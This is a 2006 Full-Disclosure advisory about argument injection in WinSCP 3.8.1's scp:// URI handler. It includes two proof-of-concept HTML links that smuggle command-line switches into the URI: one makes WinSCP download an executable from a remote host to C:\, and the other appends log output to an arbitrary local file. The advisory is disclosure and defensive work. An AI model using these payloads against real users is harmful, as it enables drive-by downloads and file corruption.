[Full-disclosure] WinSCP - URI Handler Command Switch Parsing

WinSCP - URI Handler Command Switch Parsing

About winscp :

WinSCP is an open source freeware SFTP client for Windows using SSH.
Legacy SCP protocol is also supported. Its main function is safe copying
of files between a local and a remote computer.

Versions affected :

It was tested on WinSCP 3.8.1 , previous versions may or may not be
affected

Description :

During a typical installation of winscp several URI handlers are
installed. (scp:// sftp://) It is possible to include additional command
line switches to be passed to winscp

Some of these switches may initiate a file transfer, sending a
specified file to an arbitrary ftp. or they may download executables to
a location on a pc where they would be executed. eg. the startup folder

If you create an html page with these contents

<a href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd%
20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>

And click on the link it would automatically download malware.exe to a
c:\ (asuming the host is in the cache otherwise user interaction is
required)

clicking on

<a href="scp://[email protected]:22/%22%20%22/log=c:%5csomefile%
22"log</a>

would append log output to c:\somefile possibly rendering the file
unusable in the process. Note that this also works when the host is not
in the cache

Vendor status :

Martin Prikryl was notified June 04, 2006, He will "think about a
solution"

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/